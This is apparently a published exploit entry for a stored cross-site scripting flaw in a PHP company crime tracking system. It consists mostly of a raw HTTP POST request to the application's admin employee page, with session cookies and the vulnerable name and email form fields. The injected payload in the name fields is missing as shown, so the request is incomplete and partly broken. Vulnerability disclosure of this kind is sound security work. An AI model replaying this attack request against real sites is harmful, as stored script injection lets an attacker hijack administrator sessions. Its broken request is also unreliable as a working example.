# Exploit Title: Company Crime Tracknig Software | 'fname,surname,email' Stored Cross Site Scripting # Exploit Author: Richard Jones # Date: 01-04-2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12644/company-crime-tracking-system.html # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 POST /caaz/admin/a_employees.php HTTP/1.1 Host: TARGET Content-Type: multipart/form-data; boundary=---------------------------297905141828527091333499064608 Content-Length: 1010 Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=347sjf013j8s1blsuvsa32hr7r ----------------- snip---------------- -----------------------------297905141828527091333499064608 Content-Disposition: form-data; name="fname" -----------------------------297905141828527091333499064608 Content-Disposition: form-data; name="surname" -----------------------------297905141828527091333499064608 Content-Disposition: form-data; name="email" a@Aa.com ----------------- snip----------------